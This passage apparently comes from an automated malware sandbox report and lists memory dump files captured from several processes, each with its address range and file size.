                                                                                                                        • memory/1776-194-0x0000000000970000-0x0000000000979000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          36KB

                                                                                                                        • memory/1776-193-0x0000000000B08000-0x0000000000B18000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/1860-221-0x0000000000F30000-0x00000000013DC000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4.7MB

                                                                                                                        • memory/1860-225-0x0000000073710000-0x0000000073EC0000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/1860-251-0x0000000005BD0000-0x0000000005BD1000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/1860-295-0x0000000006350000-0x00000000063A0000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          320KB

                                                                                                                        • memory/1860-266-0x0000000006760000-0x0000000006D04000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          5.6MB

                                                                                                                        • memory/1860-304-0x0000000007240000-0x000000000776C000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          5.2MB

                                                                                                                        • memory/2436-208-0x0000000002760000-0x0000000002776000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          88KB

                                                                                                                        • memory/2512-303-0x0000000000C20000-0x0000000000C66000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          280KB

                                                                                                                        • memory/2512-269-0x0000000000740000-0x0000000000A85000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.3MB

                                                                                                                        • memory/2512-253-0x0000000000740000-0x0000000000A85000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.3MB

                                                                                                                        • memory/2512-248-0x00000000001C0000-0x00000000001C1000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/2512-279-0x0000000075D00000-0x00000000762B3000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          5.7MB

                                                                                                                        • memory/2512-242-0x0000000000740000-0x0000000000A85000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.3MB

                                                                                                                        • memory/2512-256-0x0000000077230000-0x0000000077445000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          2.1MB

                                                                                                                        • memory/2512-272-0x0000000071C80000-0x0000000071D09000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          548KB

                                                                                                                        • memory/2512-265-0x0000000073710000-0x0000000073EC0000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/2512-288-0x0000000074DF0000-0x0000000074E3C000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          304KB

                                                                                                                        • memory/2512-264-0x0000000000740000-0x0000000000A85000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.3MB

                                                                                                                        • memory/2512-259-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/3320-196-0x0000000000AF8000-0x0000000000B5D000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          404KB

                                                                                                                        • memory/3320-197-0x0000000002580000-0x000000000261D000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          628KB

                                                                                                                        • memory/3320-188-0x0000000000AF8000-0x0000000000B5D000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          404KB

                                                                                                                        • memory/3320-199-0x0000000000400000-0x0000000000948000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          5.3MB

                                                                                                                        • memory/3452-355-0x0000000077230000-0x0000000077445000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          2.1MB

                                                                                                                        • memory/3452-348-0x0000000000740000-0x0000000000A72000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.2MB

                                                                                                                        • memory/3452-350-0x00000000013C0000-0x00000000013C1000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/3452-345-0x0000000000740000-0x0000000000A72000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.2MB

                                                                                                                        • memory/4104-280-0x0000000000750000-0x00000000007B0000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          384KB

                                                                                                                        • memory/4140-231-0x0000000000F40000-0x0000000000F60000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          128KB

                                                                                                                        • memory/4300-270-0x0000000002160000-0x00000000021C0000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          384KB

                                                                                                                        • memory/4308-261-0x00000000005A8000-0x0000000000614000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          432KB

                                                                                                                        • memory/4328-285-0x0000000075D00000-0x00000000762B3000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          5.7MB

                                                                                                                        • memory/4328-275-0x0000000000F40000-0x0000000001285000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.3MB

                                                                                                                        • memory/4328-257-0x0000000000F40000-0x0000000001285000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.3MB

                                                                                                                        • memory/4328-278-0x0000000000F40000-0x0000000001285000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.3MB

                                                                                                                        • memory/4328-282-0x0000000071C80000-0x0000000071D09000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          548KB

                                                                                                                        • memory/4328-249-0x0000000002CB0000-0x0000000002CF6000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          280KB

                                                                                                                        • memory/4328-263-0x0000000000F40000-0x0000000001285000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.3MB

                                                                                                                        • memory/4328-292-0x0000000074DF0000-0x0000000074E3C000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          304KB

                                                                                                                        • memory/4328-258-0x00000000012E0000-0x00000000012E1000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4328-291-0x00000000059B0000-0x00000000059B1000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4328-268-0x0000000077230000-0x0000000077445000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          2.1MB

                                                                                                                        • memory/4328-255-0x0000000000F40000-0x0000000001285000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.3MB

                                                                                                                        • memory/4336-273-0x0000000000810000-0x0000000000837000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          156KB

                                                                                                                        • memory/4520-337-0x0000000077230000-0x0000000077445000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          2.1MB

                                                                                                                        • memory/4520-349-0x0000000071C80000-0x0000000071D09000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          548KB

                                                                                                                        • memory/4520-353-0x0000000075D00000-0x00000000762B3000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          5.7MB

                                                                                                                        • memory/4520-331-0x0000000000E70000-0x00000000011A9000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.2MB

                                                                                                                        • memory/4520-328-0x0000000000990000-0x0000000000991000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4632-286-0x0000000073710000-0x0000000073EC0000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/4632-287-0x0000000004F14000-0x0000000004F15000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4632-284-0x00000000008FA000-0x00000000008FC000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          8KB

                                                                                                                        • memory/4632-294-0x0000000004F12000-0x0000000004F13000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4632-262-0x0000000000600000-0x0000000000618000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          96KB

                                                                                                                        • memory/4632-293-0x0000000004F10000-0x0000000004F11000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4728-299-0x00000000003F0000-0x000000000072C000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.2MB

                                                                                                                        • memory/4728-297-0x00000000003F0000-0x000000000072C000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.2MB

                                                                                                                        • memory/4728-302-0x0000000000A80000-0x0000000000A82000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          8KB

                                                                                                                        • memory/4728-300-0x00000000003F0000-0x000000000072C000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.2MB

                                                                                                                        • memory/4940-289-0x0000000073710000-0x0000000073EC0000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/4940-290-0x0000000000590000-0x00000000005AE000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          120KB

                                                                                                                        • memory/5116-327-0x0000000077230000-0x0000000077445000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          2.1MB

                                                                                                                        • memory/5116-341-0x0000000075D00000-0x00000000762B3000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          5.7MB

                                                                                                                        • memory/5116-336-0x0000000071C80000-0x0000000071D09000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          548KB

                                                                                                                        • memory/5116-320-0x00000000003F0000-0x00000000003F1000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/5116-318-0x0000000000740000-0x0000000000A77000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.2MB